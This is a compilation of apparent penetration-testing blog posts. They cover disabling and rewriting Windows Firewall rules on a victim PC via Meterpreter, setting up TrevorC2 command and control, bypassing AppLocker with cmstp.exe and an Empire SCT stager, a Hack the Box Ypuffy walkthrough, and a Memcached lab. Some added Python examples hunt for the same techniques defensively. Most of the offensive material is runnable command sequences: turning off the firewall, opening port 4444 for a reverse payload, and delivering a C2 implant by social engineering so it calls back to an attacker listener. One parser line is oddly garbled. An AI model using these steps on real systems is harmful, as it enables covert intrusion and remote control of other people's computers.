Firewall Penetration Testing in Remote Windows PC (netsh Tutorial)

A firewall is a network security system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented as hardware, software, or a combination of both, and come in several types: proxy firewalls, application firewalls, stateful firewalls, packet-filtering firewalls and so on.
Firewalls sit on the network boundary and are frequently used to stop unauthorized Internet users from reaching private networks, especially intranets, that are connected to the Internet. All traffic entering or leaving the intranet passes through the firewall, which examines each packet or connection and blocks those that do not meet the configured security criteria.
A host firewall such as Windows Firewall works with two kinds of rules, inbound and outbound:
Inbound rules filter traffic coming from the network to the local computer, according to the conditions specified in the rule.
Outbound rules filter traffic leaving the local computer for the network, according to the conditions specified in the rule.
Both kinds can be configured to allow or block traffic as needed.
In other words, inbound rules govern what may reach your computer: if you run a web server, you have to tell the firewall that outsiders are allowed to connect to it. Outbound rules let some programs reach the Internet while blocking others: you want your web browser (Internet Explorer, Firefox, Safari, Chrome, Opera...) to reach the Internet, so Windows Firewall needs a rule, or a default outbound policy, that allows it. By default Windows Firewall blocks unsolicited inbound connections and allows all outbound ones, which is why most of the examples below add block rules in the outbound direction.
Now let us assume that the firewall of the victim's PC is enabled:


To turn off the firewall on the victim's PC, first get a Meterpreter session and escalate to administrator (or SYSTEM) privileges on the remote PC. Drop into a command shell there and run
netsh firewall set opmode mode=disable
to turn the firewall off. Two caveats. The legacy "netsh firewall" context has been deprecated since Windows Vista; it still executes on current Windows but prints a deprecation notice, and the equivalent modern command is "netsh advfirewall set allprofiles state off". And the change is noisy: Windows records it in the Windows Firewall With Advanced Security operational event log (event ID 2003, a firewall setting changed; rule additions, changes and deletions below are 2004, 2005 and 2006), and Security Center starts warning the user that the firewall is off.



And like this, the firewall of remote PC will be disabled.


How to Block a Website on a Remote PC:

We can not only turn the firewall on or off from a Meterpreter shell but also block or allow traffic on particular ports; that is, we control the inbound and outbound rules as well. Once again, after getting a Meterpreter session and escalating to administrator privileges, drop into the shell on the remote PC and type
netsh advfirewall firewall add rule name="Block Ports" protocol=TCP dir=out remoteport=80 action=block
Here,
name = the name of the rule (pick something descriptive; you will need the exact name to delete the rule later).
protocol = the protocol to match (TCP or UDP in most cases; icmpv4, icmpv6 and any are also accepted).
dir = the direction of the rule: in or out.
remoteport = the port on the remote host that is matched. Use localport instead to match a port on the victim's own machine, for example a listening service.
action = block or allow. In our case we want to block the connection.


Once you run the command, every outbound TCP connection to port 80 on any host is blocked, and a new entry appears in the Windows firewall:


If you open the rule's properties and click the 'Protocols and Ports' tab, you can see the result.


How to Block Multiple Ports

Now that we know how to block a port on the remote PC, let us dig a little deeper: a single rule can block two or more ports if remoteport is given a comma-separated list (ranges such as 5000-5010 also work). Again, with a Meterpreter session and administrator privileges on the remote PC, type
netsh advfirewall firewall add rule name="Block Ports" protocol=TCP dir=out remoteport=80,443 action=block


Once you run the command, all outbound TCP requests to ports 80 and 443 on any host are blocked, and the rule is added to the Windows firewall:


If you open the rule's properties and click the 'Protocols and Ports' tab, you will see that both port 80 and port 443 are now blocked:


By blocking outbound ports 80 and 443 we have cut off HTTP and HTTPS from the remote PC, so the victim can no longer reach ordinary websites (a site served on a non-standard port would still load). The browser shows the following error:


How to view Firewall Rules

Now we will learn how to view the inbound and outbound rules of the firewall on the remote PC, how to delete a rule, how to allow the port that our payload will use later, and how to stop the remote PC from answering pings.
First, let us assume that an outbound rule on the remote PC blocks a port:


To see which rules exist on the remote PC and whether each is enabled or disabled, get a Meterpreter session and escalate to administrator privileges. Then type:
netsh advfirewall firewall show rule name=all
(The parameter is name=all, not rule=all. Add dir=in or dir=out to list only one direction, or verbose to see each rule's program and service as well.) Once this command executes, all the rules are displayed:



In the above image, we can see that ports 80 and 443 are blocked under the rule named "Block All Ports". To delete that rule on the remote PC, type:
netsh advfirewall firewall delete rule name="Block All Ports"
Use the exact name the rule was created with (the rule in the screenshot is "Block All Ports"; if you followed the command above literally, yours is "Block Ports"). netsh deletes every rule carrying that name; add dir=out or protocol=TCP to the command to narrow it if the name is shared.


Once this command has executed, the rule is deleted. Run
netsh advfirewall firewall show rule name=all
again to see the result:



We can also see the result in the firewall's outbound rules:



Our default Meterpreter payload connects back on port 4444. To make sure the remote PC can reach that port when we later drop a payload, we add an allow rule:
netsh advfirewall firewall add rule name="Allow Port 4444" protocol=TCP dir=out remoteport=4444 action=allow
Two things to keep in mind. Windows Firewall's default outbound action is Allow, so this rule only changes anything if the default has been switched to Block; and an explicit block rule always wins over an allow rule, so if a block rule covers 4444 you must delete it rather than add an allow rule on top. The rule above suits a reverse payload, which connects out from the victim; a bind payload listening on the victim needs an inbound rule instead (dir=in localport=4444).



Once this command has executed, port 4444 is allowed on the remote PC:



Now, to stop the remote PC from answering pings, type:
netsh advfirewall firewall add rule name="All ICMPV4" dir=in action=block protocol=icmpv4
This blocks every inbound ICMPv4 message, not just echo requests. To block only ping and leave the rest of ICMP alone (fragmentation-needed messages, for example), use protocol=icmpv4:8,any, where 8 is the echo-request type.





When this command executes, a rule blocking pings to the remote PC is created:



And the following will be the result :
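Reading the rule listing off a screenshot does not scale, so here is an added example (not code from the original article) that parses the text netsh advfirewall firewall show rule name=all prints and answers "would this connection get through?" the way Windows Firewall does: an enabled Block rule that matches beats any matching Allow rule, and with no match the profile default applies (inbound Block, outbound Allow unless changed). The rule listing inside it is a constructed sample in netsh's format with shortened padding, not output captured from a host; on a real engagement redirect the real command's output to a file, pull the file back through Meterpreter and feed it to parse_rules().

```python
"""Audit a Windows Firewall rule dump (added example, not from the original article).

Parses `netsh advfirewall firewall show rule name=all` output and decides
Allow/Block for a given connection with Windows Firewall's precedence: an
enabled Block rule that matches wins over any matching Allow rule; with no
match the profile default applies (inbound Block, outbound Allow by default).
"""
import re
from dataclasses import dataclass

# Constructed sample in netsh's output format (padding shortened). The rules
# are made up to resemble the ones added in the article.
SAMPLE_OUTPUT = """
Rule Name:        Block All Ports
-----------------------------------------------
Enabled:          Yes
Direction:        Out
LocalIP:          Any
RemoteIP:         Any
Protocol:         TCP
LocalPort:        Any
RemotePort:       80,443
Action:           Block

Rule Name:        Allow Port 4444
-----------------------------------------------
Enabled:          Yes
Direction:        Out
LocalIP:          Any
RemoteIP:         Any
Protocol:         TCP
LocalPort:        Any
RemotePort:       4444
Action:           Allow

Rule Name:        All ICMPV4
-----------------------------------------------
Enabled:          Yes
Direction:        In
LocalIP:          Any
RemoteIP:         Any
Protocol:         ICMPv4
                  Type    Code
                  Any     Any
Action:           Block
Ok.
"""

@dataclass
class Rule:
    name: str
    enabled: bool
    direction: str      # "In" or "Out"
    action: str         # "Allow" or "Block"
    protocol: str       # "TCP", "UDP", "ICMPv4", "Any", ...
    local_ports: set    # empty set means Any
    remote_ports: set
    remote_ip: str

def parse_ports(spec):
    """'80,443' -> {80, 443}; '5000-5002' -> {5000, 5001, 5002}; 'Any' -> set()."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if part.lower() in ("", "any"):
            continue
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
            ports.update(range(lo, hi + 1))
        elif part.isdigit():
            ports.add(int(part))
    return ports

def parse_rules(text):
    """Split netsh output into Rule objects; each 'Rule Name:' line starts a rule."""
    blocks = []
    for line in text.splitlines():
        m = re.match(r"^(\S[^:]*):\s*(.*)$", line)
        if not m:
            continue  # separator lines, the ICMP type/code table, "Ok."
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Rule Name":
            blocks.append({"Rule Name": val})
        elif blocks:
            blocks[-1][key] = val
    return [Rule(name=b["Rule Name"], enabled=b.get("Enabled") == "Yes",
                 direction=b.get("Direction", ""), action=b.get("Action", ""),
                 protocol=b.get("Protocol", "Any"),
                 local_ports=parse_ports(b.get("LocalPort", "Any")),
                 remote_ports=parse_ports(b.get("RemotePort", "Any")),
                 remote_ip=b.get("RemoteIP", "Any")) for b in blocks]

def verdict(rules, direction, protocol, port=None):
    """(decision, deciding rule) for traffic in `direction` ("In"/"Out") on protocol/port.

    Outbound traffic is judged on the remote port (a reverse shell connecting
    out to 4444); inbound traffic on the local port (a bind shell listening on 4444).
    """
    def matches(r):
        ports = r.remote_ports if direction == "Out" else r.local_ports
        return (r.enabled and r.direction == direction
                and r.protocol.lower() in (protocol.lower(), "any")
                and (not ports or port in ports))
    hits = [r for r in rules if matches(r)]
    for wanted in ("Block", "Allow"):  # Block beats Allow
        for r in hits:
            if r.action == wanted:
                return wanted, r.name
    return ("Allow" if direction == "Out" else "Block"), "<profile default>"
```

The precedence rule is the one that bites in practice: the "Allow Port 4444" rule from the step above is irrelevant while any enabled block rule still covers 4444, which the second call in the check below demonstrates.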



View Current Profile Status

Now we will see how to block or allow a particular IP address in the remote PC's firewall, how to view the programs and ports on the exception (allowed) list, and how to check the firewall's main settings and its current profile, i.e. whether it is on or off. To show which profile (Domain, Private or Public) is active and its state, type:
netsh advfirewall show currentprofile
(currentprofile, singular, is the netsh keyword; use allprofiles to see all three.)


After checking the profile, we can see which programs are allowed through the firewall on the remote PC. For this, type:
netsh firewall show allowedprogram
(This and the next two commands use the deprecated "netsh firewall" context; they still run on current Windows, with a deprecation notice. The advfirewall equivalent is to read the Program field in the output of netsh advfirewall firewall show rule name=all verbose.)



The next command shows the status of the main settings (operational mode, exception mode, notifications and so on). To see them, type:
netsh firewall show config



We can also see where the firewall log is kept (by default %systemroot%\system32\LogFiles\Firewall\pfirewall.log) and whether dropped and allowed connections are being logged. For this, type:
netsh firewall show logging
(The same information appears under Logging in the output of netsh advfirewall show currentprofile.)




The firewall also lets us block a single IP address while allowing all others, and vice versa. To block a single IP, type:
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=192.168.0.15/32
(The "/32" is the subnet mask in CIDR notation; /32 means exactly one host. A range such as remoteip=192.168.0.0/24 or 192.168.0.10-192.168.0.20 is accepted as well. Because dir=in, this stops 192.168.0.15 from connecting to the victim; it does not stop the victim from connecting out to that host, which would need a second rule with dir=out.)


After executing the said command, we can see the following result:



If we now open the properties of the IP Block rule, we can see that the IP 192.168.0.15 is blocked:



Similarly, to allow a particular IP address, type:
netsh advfirewall firewall add rule name="Allow IP" dir=in interface=any action=allow remoteip=192.168.0.15/32
(Again "/32" is the CIDR subnet mask for a single host. Note how broad this rule is: with no protocol or port given, it allows every inbound connection from that host; and if a block rule for the same address still exists, the block wins.)



After executing the said command, you can see the following result:



If we open the properties of the Allow IP rule, we can see that the IP 192.168.0.15 is allowed:



Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles and a hacking enthusiast.

TrevorC2 - Command and Control


TrevorC2 is a command and control framework from TrustedSec. It uses a client/server model in which the server masquerades as a legitimate website (it clones a site of your choosing) and the implant retrieves its tasking by requesting that page like a normal browser, so the C2 channel blends in with ordinary web traffic. Check-ins happen at randomized intervals, which makes the beaconing harder to spot by timing alone. The server is written in Python, and clients exist in Python, C# and PowerShell, so it works against Windows and macOS as well as Linux. It is easy and convenient to use.
You can download it from: https://github.com/trustedsec/trevorc2

Once it is downloaded, open the folder and edit trevorc2_server.py: set the IP address to your local host IP as shown in the image below, and set the site that the server will clone.
Then start the TrevorC2 server.
Once the server is up and running, set the same IP in the PowerShell client, trevorc2_client.ps1 (the client's settings must match the server's, including the shared cipher key and query parameters if you changed them).
Then deliver this file to the victim by whatever social engineering method you prefer. Once the victim runs it, you get a session, as shown in the image below.
To see the sessions, type:
list
And to access a session, type:
interact
followed by the session number.

Bypass Application Whitelisting using cmstp


AppLocker's default rules allow any executable in trusted locations such as the Windows folder to run, and that is the main reason it can be bypassed: signed Microsoft binaries that live there and can be talked into running arbitrary code are trusted by policy, and several of them also help bypass UAC. One such binary is CMSTP (cmstp.exe, the Connection Manager Profile Installer), an auto-elevating Microsoft binary that takes an INF file as input; a crafted INF can make it execute arbitrary code. We will learn how to perform this exploitation.
CMSTP itself does not run SCT files. The INF handed to it can, however, point at scrobj.dll together with the path or URL of a COM scriptlet (.sct), and CMSTP then loads that scriptlet without any prompt (the same scrobj.dll trick regsvr32 is known for). So we create a malicious SCT to reach our goal, using Empire PowerShell. For a detailed guide on Empire PowerShell, see the separate article.
Launch the empire framework from the terminal of Kali and then type the following commands to create your malware :
listeners
uselistener http
set Host 192.168.1.109
execute
These commands create a listener. Type back to leave the listener menu, then generate the SCT file with:
usestager windows/launcher_sct
set Listener http
execute
(The Listener option takes the listener's name, which is http by default when created with uselistener http.)



Running the stager writes your SCT file. We then use an INF file that makes cmstp.exe load it: in that INF, give the path (or URL) of your SCT file on the line shown in the image.

Download this script from here:



Now transfer the INF file to the victim's PC and run the following in the victim's command prompt:
cmstp.exe /s shell.inf
(/s runs the installer silently, without prompts; /ni, often added as well, suppresses the desktop icon it would otherwise create. No special privileges are needed for the INF to be processed, and all the work is done by a trusted, signed Microsoft binary, which is the whole point.)



As soon as the command runs, an agent checks in. Use the following command to access your session:
interact
followed by the agent's name.
This way you can use the CMSTP binary to bypass AppLocker restrictions: CMSTP needs an INF file, and by controlling that file you get code execution on the victim's PC under a trusted, signed Microsoft binary.
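The flip side of the technique is what it looks like in telemetry. The following is an added example (not part of the original post) that hunts through process-creation records of the kind Sysmon Event ID 1 or Security event 4688 provide (image, command line, parent image) for the tell-tale signs of the step above: cmstp.exe handed an INF from outside the Windows and Program Files trees, a silent /s install of such an INF, cmstp.exe started from a shell or script host, and cmstp.exe spawning a child process, which a legitimate Connection Manager install should not do. The five event records in it are constructed for the example, including a benign vendor install that must not be flagged.

```python
"""Hunting for the cmstp.exe INF trick (added example, not from the original post).

Input records mimic Sysmon Event ID 1 / Security 4688 fields. Findings:
  * INF loaded from a location that is not a trusted install tree (including
    relative paths such as `cmstp.exe /s shell.inf`), marked "silent" when /s is set
  * cmstp.exe started by a shell or script host
  * cmstp.exe spawning a child process
"""
import ntpath
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str

EVENTS = [  # constructed sample records, not captured telemetry
    ProcEvent(r"C:\Windows\System32\cmstp.exe", r"cmstp.exe /s shell.inf",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe /ni /s C:\Users\bob\AppData\Local\Temp\shell.inf",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\cmstp.exe",
              r'"C:\Windows\System32\cmstp.exe" /s "C:\Program Files\VendorVPN\profile.inf"',
              r"C:\Windows\System32\msiexec.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -nop -w hidden -enc SQBFAFgA", r"C:\Windows\System32\cmstp.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"svchost.exe -k netsvcs",
              r"C:\Windows\System32\services.exe"),
]

TRUSTED_INF_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
INF_RE = re.compile(r'"([^"]+\.inf)"|(\S+\.inf)\b', re.IGNORECASE)

def inf_path(command_line):
    """The .inf argument, quoted or bare; None if the command line has none."""
    m = INF_RE.search(command_line)
    return (m.group(1) or m.group(2)) if m else None

def classify(ev):
    """Findings for one event; an empty list means nothing suspicious."""
    findings = []
    image = ntpath.basename(ev.image).lower()
    parent = ntpath.basename(ev.parent_image).lower()
    if image == "cmstp.exe":
        path = inf_path(ev.command_line)
        silent = re.search(r"(?:^|\s)/s(?:\s|$)", ev.command_line, re.IGNORECASE) is not None
        if path is not None and not path.lower().startswith(TRUSTED_INF_DIRS):
            # relative paths end up here as well: they are never a trusted location
            findings.append(("silent " if silent else "") + f"INF from untrusted path: {path}")
        if parent in SHELLS:
            findings.append(f"cmstp.exe launched by {parent}")
    elif parent == "cmstp.exe":
        findings.append(f"cmstp.exe spawned {image}")
    return findings

def hunt(events):
    """(command line, findings) for every event with at least one finding."""
    hits = []
    for ev in events:
        findings = classify(ev)
        if findings:
            hits.append((ev.command_line, findings))
    return hits
```

The INF-path check is the one worth tuning: software that ships Connection Manager profiles installs them from under Program Files, so the trusted-directory list is what keeps the benign record quiet while the two attacker-style records and the child process fire.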

Hack the Box: Ypuffy Walkthrough

Today we are going to solve another CTF challenge, "Ypuffy". It is a retired vulnerable lab from Hack the Box, which offers a collection of vulnerable labs as challenges, from beginner to expert level, so that pentesters can practise online according to their experience.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: since these labs are available online they have static IPs. The IP of Ypuffy is 10.10.10.107
Penetration Methodology
·        Network scanning (Nmap)
·        Enumerating LDAP on port 389 with the ldap-search script
·        Listing SMB shares with smbclient (pass-the-hash) and retrieving a private key
·        Connecting to the VM over SSH with the private key
·        Enumerating files with the SUID bit set
·        Discovering that alice1978 can run ssh-keygen as userca
·        Discovering the commands sshd runs at login to fetch keys and principals
·        Fetching root's principal with curl
·        Locating the CA private key on the system
·        Signing our own key with the CA key via doas, using the principal found earlier
·        Logging in over SSH with the new certificate
·        Snagging the flag
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sV -sC 10.10.10.107


The nmap scan shows five open ports: 22 (SSH), 80 (HTTP), 139 (NetBIOS/SMB), 389 (LDAP) and 445 (SMB).
Since LDAP is listening on port 389, we use the nmap script ldap-search to enumerate the directory, which permits anonymous binds, and find the NT password hash (the sambaNTPassword attribute) of the user alice1978.
nmap -p 389 --script ldap-search 10.10.10.107


With a username and NT hash we can authenticate to SMB with smbclient, passing the hash instead of a password (--pw-nt-hash tells smbclient that the string after % is an NT hash; this is pass-the-hash).
First we list the shares on the target and find one called "alice". We then connect to it, find a file called "my_private_key.ppk", and download it to our local system.
smbclient -L \\\\10.10.10.107\\ -U alice1978%<hash> --pw-nt-hash
smbclient \\\\10.10.10.107\\alice -U alice1978%<hash> --pw-nt-hash
get my_private_key.ppk


The downloaded file is a PuTTY private key, so we use puttygen to convert it to an OpenSSH RSA private key. We then restrict the key's permissions (ssh refuses to use a key readable by other users) and log in over SSH with it.
puttygen my_private_key.ppk -O private-openssh -o id_rsa
chmod 600 id_rsa
ssh -i id_rsa alice1978@10.10.10.107
After logging in through SSH, we find a file called “user.txt”. We take a look at the contents of the file and find the first flag.


Now we look for files with the SUID bit set and find doas, a privilege-delegation utility similar to sudo (the OpenBSD default). We check /etc/doas.conf to see which commands we may run and find that we can run /usr/bin/ssh-keygen as the user userca.
find / -perm -4000 2>/dev/null
cat /etc/doas.conf


To enumerate further we open the SSH daemon configuration at /etc/ssh/sshd_config and find that sshd fetches authorized keys and principals from a local web service: its AuthorizedKeysCommand is "/usr/bin/curl http://127.0.0.1/sshauth?type=key&username=%u" and its AuthorizedPrincipalsCommand is "/usr/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u" (sshd substitutes the login name for %u). For certificate logins sshd must also trust a CA through TrustedUserCAKeys, which is why the CA key we find below matters.


Querying that web service ourselves, we request the key for the root user and get no response, but we do get root's principal:
curl "http://127.0.0.1/sshauth?type=principals&username=root"


With root's principal in hand we can generate an SSH key pair and have it signed into a certificate carrying that principal; sshd will then accept the certificate for root. We already know we can run ssh-keygen as userca, but signing needs the CA private key. Looking around the machine we find it at /home/userca/ca, readable by userca, which is exactly the account the doas rule gives us.


First we generate a key pair and move it to /tmp so that userca can read the public key and write the certificate next to it. Then, as userca, we sign the public key with the CA key, setting the principal (-n) to the value we pulled from the web service. -I is only the certificate's identity string, which shows up in sshd's logs; it has no bearing on who the certificate grants access to.
ssh-keygen
mv .ssh/id_rsa* /tmp/
doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgency84ckd00r -I root /tmp/id_rsa.pub
This writes the certificate to /tmp/id_rsa-cert.pub.


With the signed certificate sitting beside the private key (ssh picks up id_rsa-cert.pub automatically when given -i /tmp/id_rsa), we log in as root, find root.txt and read the final flag.
ssh -i /tmp/id_rsa root@localhost
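To make the chain behind this escalation explicit, here is an added example (not part of the original walkthrough) that reads sshd_config and doas.conf text and reports the two facts the attack depends on: the exact command sshd runs to fetch a user's principals (the one we reproduced with curl), and which doas rules let someone run ssh-keygen as an account that can read the CA private key, which only matters if sshd trusts a CA at all. The two config fragments in it are constructed for the example, modelled on what the walkthrough describes, not copied from the box; the file names /home/userca/ca.pub and the use of TrustedUserCAKeys are assumptions.

```python
"""Checking the sshd certificate-trust chain (added example, not from the original walkthrough).

OpenSSH accepts a certificate for an account when TrustedUserCAKeys names a CA
public key, the certificate is signed by that CA, and one of the certificate's
principals appears in the list AuthorizedPrincipalsCommand (or
AuthorizedPrincipalsFile) produces for that account. Ypuffy's escalation is
where that chain meets a doas rule letting an ordinary user run ssh-keygen as
the owner of the CA private key.
"""
import re

SSHD_CONFIG = """
Port 22
PubkeyAuthentication yes
AuthorizedKeysCommand /usr/bin/curl http://127.0.0.1/sshauth?type=key&username=%u
AuthorizedKeysCommandUser nobody
AuthorizedPrincipalsCommand /usr/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
PasswordAuthentication no
"""  # constructed fragment, not the box's real file

DOAS_CONF = """
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
"""  # constructed fragment

def sshd_directives(text):
    """Map lower-cased sshd_config keyword -> value. sshd keeps the first value
    it sees for a keyword, and everything after a Match line is conditional,
    so parsing stops there."""
    out = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        out.setdefault(key, parts[1] if len(parts) > 1 else "")
    return out

def doas_rules(text):
    """Parse doas.conf lines: permit [options] identity [as target] [cmd command [args ...]]."""
    options = {"nopass", "nolog", "persist", "keepenv"}
    rules = []
    for raw in text.splitlines():
        toks = raw.split("#", 1)[0].split()
        if not toks or toks[0] != "permit":
            continue
        i = 1
        while i < len(toks) and toks[i] in options:
            i += 1
        if i >= len(toks):
            continue
        rule = {"identity": toks[i], "target": None, "cmd": None, "args": []}
        i += 1
        if i + 1 < len(toks) and toks[i] == "as":
            rule["target"] = toks[i + 1]
            i += 2
        if i + 1 < len(toks) and toks[i] == "cmd":
            rule["cmd"] = toks[i + 1]
            i += 2
            if i < len(toks) and toks[i] == "args":
                rule["args"] = toks[i + 1:]
        rules.append(rule)
    return rules

def principals_command_for(sshd_conf, user):
    """The exact command sshd runs to fetch `user`'s principals (%u expanded).
    Running it yourself, as the walkthrough does with curl, reveals the
    principal a forged certificate must carry."""
    cmd = sshd_directives(sshd_conf).get("authorizedprincipalscommand")
    return None if cmd is None else cmd.replace("%u", user)

def ca_signing_paths(sshd_conf, doas_conf, ca_key_owner):
    """doas rules that let someone run ssh-keygen as an account able to read the
    CA private key. A rule without `as` runs as root, who can read anything, so
    root counts too; a rule without `cmd` permits any command. Returns [] when
    sshd trusts no CA, because a forged certificate is then worthless."""
    if "trustedusercakeys" not in sshd_directives(sshd_conf):
        return []
    paths = []
    for r in doas_rules(doas_conf):
        target = r["target"] or "root"
        if target in (ca_key_owner, "root") and (r["cmd"] is None or r["cmd"].endswith("ssh-keygen")):
            paths.append((r["identity"], target, r["cmd"]))
    return paths
```

On a hardening review the same two functions tell you what to fix: either stop delegating ssh-keygen (or any command) to the account that owns the CA key, or move the CA key off the host entirely; the principals endpoint leaking root's principal is a secondary problem, because a forged certificate is useless without the signing key.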


Pentest Lab Setup on Memcached

In this article we are going to set up a Memcached penetration-testing lab on Ubuntu 18.04. Memcached is used by many organisations to cache frequently requested data in memory, which takes load off databases and back-end servers and cuts response times.

Table of contents
·        Introduction to Memcached.
·        Memcached installation.
·        Memcached configuration.

Introduction to Memcached
Memcached is a free, open-source, distributed memory-object caching system: an in-memory key-value store for small chunks of arbitrary data (strings, objects) that would otherwise come from database calls, API calls or page rendering. It speeds up dynamic web applications by serving that data from RAM instead of hitting the database every time. It is simple yet powerful, quick to deploy and easy to develop against, and it solves many of the problems that large data caches face. Client APIs exist for most popular languages.
Memcached installation                                                                             
To install, boot up your Ubuntu machine and open the terminal.
Note: Apache2 should be installed before Memcached. Install it with a single command (run these commands as root, or prefix them with sudo):

apt install apache2

With Apache in place, install Memcached with the command shown below.

apt install memcached


After installing Memcached, add the ppa:ondrej/php PPA to your Ubuntu system's repositories so that the latest available PHP version can be installed. Follow the commands shown below.

add-apt-repository ppa:ondrej/php


After adding the repository, update the system by typing in the following command.
apt update


Now, install PHP by executing the command shown below :

apt install -y php php-dev php-pear libapache2-mod-php


Now that PHP has been installed successfully in our system, we will go ahead and install the PHP Memcached module by executing the below command:
apt install -y php-memcached


Once the installation is complete, restart the Apache2 service.
service apache2 restart


Now check that the PHP extension is working by creating a file called info.php, using nano or any text editor you like, with the following content:
<?php
  phpinfo();
?>

Save the file as /var/www/html/info.php.
Once the file is saved, open it in your web browser:
http://localhost/info.php

You should see the results shown in the image below, including a memcached section confirming that the extension is loaded. Remove info.php again once you have checked: it publishes the server's full PHP configuration to anyone who can reach it.


Memcached Configuration

Now we configure the Memcached server by editing its configuration file, /etc/memcached.conf, with nano or any other text editor. The settings shown below are present and active by default; we list them so that you know where to find them, what they do, and how to change them if necessary. The ones that matter for a basic Memcached setup are:
-m 64
-m sets the maximum amount of memory the daemon may use for cached items, in megabytes. The default is 64 MB.
-p 11211
-p sets the TCP port. The default is 11211.
-u memcache
-u sets the account the daemon runs as: when started by root it drops privileges to this user (memcache), so it does not keep running as root.
Now comment out the line "-l 127.0.0.1" by putting a # in front of it, as shown in the image. By default memcached binds only to the loopback address, so it is reachable only from the machine itself; with the -l line disabled it listens on all interfaces (0.0.0.0) and traffic can reach it from any host, including the Internet if the machine is exposed. That is the misconfiguration we want in a lab, and exactly what you must never do in production: the memcached protocol has no authentication, and Internet-exposed instances were widely abused as UDP amplifiers in the 2018 DDoS attacks.


Once you have saved the configuration file, restart the service:
service memcached restart
Then confirm that the new binding is in effect by listing the listening TCP sockets; memcached should now appear on 0.0.0.0:11211 instead of 127.0.0.1:11211:
ss -tnl


Now connect to Memcached with telnet and do a version check by typing the version command (the stats command gives a fuller picture of the running instance):
telnet localhost 11211
version
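The telnet check above works because memcached's text protocol is plain ASCII with no authentication, so it is worth being able to drive it from a script. Here is an added example (not part of the original article) with two parts: a check of memcached.conf text that reports where the daemon will listen and therefore whether it is exposed, which is exactly the change made in the configuration step, and a client that sends the same version and stats commands you typed into telnet and parses the replies. The config and protocol samples in it are constructed; nothing touches the network unless you call probe_memcached() against a host of your own.

```python
"""Memcached lab checks (added example, not part of the original article).

listener_addresses()/is_exposed(): read memcached.conf text and say where the
daemon binds. parse_version()/parse_stats(): decode replies of the text
protocol. probe_memcached(): put both together against a live server.
"""
import shlex
import socket

# Constructed config fragments: the stock Ubuntu 18.04 binding, and the lab
# change from the configuration step (the -l line commented out).
CONF_DEFAULT = "-m 64\n-p 11211\n-u memcache\n-l 127.0.0.1\n"
CONF_LAB = "-m 64\n-p 11211\n-u memcache\n# -l 127.0.0.1\n"

def listener_addresses(conf_text):
    """Addresses memcached will bind to. Commented-out -l lines do not count;
    with no active -l the daemon binds every interface, reported as 0.0.0.0.
    memcached accepts comma-separated lists (-l 127.0.0.1,::1) and --listen=."""
    addrs = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        toks = shlex.split(line)
        for i, tok in enumerate(toks):
            if tok == "-l" and i + 1 < len(toks):
                addrs += [a.strip() for a in toks[i + 1].split(",")]
            elif tok.start_with("--listen=") if False else tok.startswith("--listen="):
                addrs += [a.strip() for a in tok[len("--listen="):].split(",")]
    return addrs or ["0.0.0.0"]

def is_exposed(conf_text):
    """True if any listener address is not a loopback address."""
    return any(a not in ("127.0.0.1", "::1", "localhost") for a in listener_addresses(conf_text))

def parse_version(reply):
    """A 'version' reply is one line: VERSION <string>. None for anything else (e.g. ERROR)."""
    first = reply.decode("ascii", "replace").split("\r\n", 1)[0]
    return first[len("VERSION "):] if first.startswith("VERSION ") else None

def parse_stats(reply):
    """A 'stats' reply is 'STAT <name> <value>' lines terminated by a lone END."""
    stats = {}
    for line in reply.decode("ascii", "replace").split("\r\n"):
        if line == "END":
            break
        if line.startswith("STAT "):
            _, name, value = line.split(" ", 2)
            stats[name] = value
    return stats

def _recv_until(sock, marker):
    buf = b""
    while not buf.endswith(marker):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf

def probe_memcached(host, port=11211, timeout=3.0):
    """Query a live server. The text protocol has no authentication, so
    reaching the port is all it takes to read its version and counters."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"version\r\n")
        version = parse_version(_recv_until(s, b"\r\n"))
        s.sendall(b"stats\r\n")
        stats = parse_stats(_recv_until(s, b"END\r\n"))
    return {"version": version, "uptime": stats.get("uptime"),
            "curr_items": stats.get("curr_items"),
            "curr_connections": stats.get("curr_connections")}
```

Against the lab box, probe_memcached("192.168.1.32") from the attacking machine should succeed once the -l line is commented out and fail with a connection refusal while it is in place; that pair of results is the whole lesson of the binding change.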


From your attacking machine you can use nmap to confirm that the Memcached service is reachable on the lab server (192.168.1.32 here):
nmap -sV -p- 192.168.1.32


Conclusion
To conclude, Memcached is a simple caching system. Items can be given an expiration time, and when the cache runs out of memory it evicts items using an LRU policy: the ones that have not been requested for the longest time are replaced by new ones. The article above has given you a basic guide to setting up a Memcached penetration-testing lab.